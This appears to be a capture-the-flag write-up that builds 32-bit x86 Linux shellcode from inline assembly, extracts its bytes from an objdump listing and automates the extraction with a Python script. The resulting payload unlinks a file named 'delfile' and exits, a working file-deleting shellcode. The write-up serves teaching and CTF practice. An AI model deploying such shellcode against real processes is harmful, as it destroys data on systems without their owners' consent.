1. 加减乘除 (Add, Subtract, Multiply, Divide) http://ctf1.simplexue.com/overflow/1/

Given a piece of assembly code, find the corresponding shellcode.

Write the C code on Linux (this is 32-bit x86 code: `int $0x80` with `%ebx`, so on a 64-bit host build it with `gcc -m32`):
```c
/* shellcodeasm.c: 32-bit x86 Linux; build with gcc -m32 shellcodeasm.c -o shellcodeasm */
void main()
{
    asm(
        "_start:\n\t"
        "jmp test1\n\t"          /* jmp/call trick: obtain the string's address without hard-coding it */
        "test2:\n\t"
        "pop %ebx\n\t"           /* ebx = return address pushed by call = address of "delfile" */
        "movb $0xa,%al\n\t"      /* al = 10 = sys_unlink on i386 (only the low byte of eax is written) */
        "int $0x80\n\t"          /* unlink("delfile") */
        "movb $0x1,%al\n\t"      /* al = 1 = sys_exit */
        "xor %ebx, %ebx\n\t"     /* exit status 0 */
        "int $0x80\n\t"
        "test1:\n\t"
        "call test2\n\t"         /* pushes the address of the string that follows, jumps back to test2 */
        ".string \"delfile\"");  /* file name; .string appends a terminating 0x00 */
}
```
Compile shellcodeasm.c with gcc, then dump the disassembly of .text with objdump:
**objdump -j .text -Sl shellcodeasm | more**
```
080483dc <main>:
main():
/home/gwen/Desktop/ntt.c:3
 80483dc:	55                   	push   %ebp
 80483dd:	89 e5                	mov    %esp,%ebp

080483df <_start>:
/home/gwen/Desktop/ntt.c:4
 80483df:	eb 0b                	jmp    80483ec <test1>

080483e1 <test2>:
 80483e1:	5b                   	pop    %ebx
 80483e2:	b0 0a                	mov    $0xa,%al
 80483e4:	cd 80                	int    $0x80
 80483e6:	b0 01                	mov    $0x1,%al
 80483e8:	31 db                	xor    %ebx,%ebx
 80483ea:	cd 80                	int    $0x80

080483ec <test1>:
 80483ec:	e8 f0 ff ff ff       	call   80483e1 <test2>
 80483f1:	64                   	fs
 80483f2:	65                   	gs
 80483f3:	6c                   	insb   (%dx),%es:(%edi)
 80483f4:	66 69 6c 65 00 5d c3 	imul   $0xc35d,0x0(%ebp,%eiz,2),%bp
```
Locate the assembly starting at `_start` and concatenate its opcode bytes, stopping before the `00` (the bytes after `call` are the string "delfile"; objdump disassembles them as nonsense instructions). The shellcode is:

`\xeb\x0b\x5b\xb0\x0a\xcd\x80\xb0\x01\x31\xdb\xcd\x80\xe8\xf0\xff\xff\xff\x64\x65\x6c\x66\x69\x6c\x65`
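As an added illustration (not part of the original writeup), the following Python script performs the extraction step above mechanically: it parses the objdump listing (re-typed here from the page as a constructed string), collects the opcode bytes in order, checks for the 0x00 that `.string` appended, cuts the payload there, and renders the `\xNN` form. The function names `listing_bytes`, `shellcode_until_nul`, `has_nul`, `embedded_string` and `to_escaped` are my own.

```python
import re

# Constructed from the objdump listing above (x86-32, AT&T syntax);
# only the lines from _start onward belong to the shellcode.
OBJDUMP_LISTING = """\
080483df <_start>:
 80483df: eb 0b                jmp    80483ec <test1>
080483e1 <test2>:
 80483e1: 5b                   pop    %ebx
 80483e2: b0 0a                mov    $0xa,%al
 80483e4: cd 80                int    $0x80
 80483e6: b0 01                mov    $0x1,%al
 80483e8: 31 db                xor    %ebx,%ebx
 80483ea: cd 80                int    $0x80
080483ec <test1>:
 80483ec: e8 f0 ff ff ff       call   80483e1 <test2>
 80483f1: 64                   fs
 80483f2: 65                   gs
 80483f3: 6c                   insb   (%dx),%es:(%edi)
 80483f4: 66 69 6c 65 00 5d c3 imul   $0xc35d,0x0(%ebp,%eiz,2),%bp
"""

ADDR_LINE = re.compile(r"^\s*[0-9a-f]+:\s+(.*)$")  # "addr: bytes mnemonic ..."
HEX_BYTE = re.compile(r"^[0-9a-f]{2}$")


def listing_bytes(listing: str) -> bytes:
    """Concatenate the opcode bytes of every instruction line, in order.

    Symbol lines such as '080483e1 <test2>:' carry no bytes and are skipped;
    on an instruction line the byte column ends at the first token that is
    not a two-digit hex pair (i.e. the mnemonic).
    """
    out = bytearray()
    for line in listing.splitlines():
        m = ADDR_LINE.match(line)
        if not m:
            continue
        for tok in m.group(1).split():
            if not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def shellcode_until_nul(code: bytes) -> bytes:
    """Return the bytes before the first 0x00 (the .string terminator)."""
    nul = code.find(b"\x00")
    return code if nul < 0 else code[:nul]


def has_nul(code: bytes) -> bool:
    """True if a 0x00 byte is present; a string-copy style overflow stops there."""
    return b"\x00" in code


def embedded_string(code: bytes) -> str:
    """The file name whose address 'call test2' pushes: everything after the
    5-byte call (e8 + rel32) up to the terminator."""
    call_at = code.find(b"\xe8")
    return shellcode_until_nul(code[call_at + 5:]).decode("ascii")


def to_escaped(code: bytes) -> str:
    """Render as the \\xNN form used in the writeup."""
    return "".join(f"\\x{b:02x}" for b in code)


if __name__ == "__main__":
    raw = listing_bytes(OBJDUMP_LISTING)
    sc = shellcode_until_nul(raw)
    print(f"{len(raw)} bytes in listing, {len(sc)} before the first 0x00")
    print("embedded string:", embedded_string(raw))
    print(to_escaped(sc))
```

The 25 bytes that remain are NUL-free, which is why the writeup stops at the `00`. Note that dropping the terminator also drops the end of the string "delfile" inside the payload, so in the target process whatever byte happens to follow the shellcode in memory decides where the file name ends; the trailing `5d c3` (`pop %ebp; ret`) is the epilogue of `main` and not part of the shellcode.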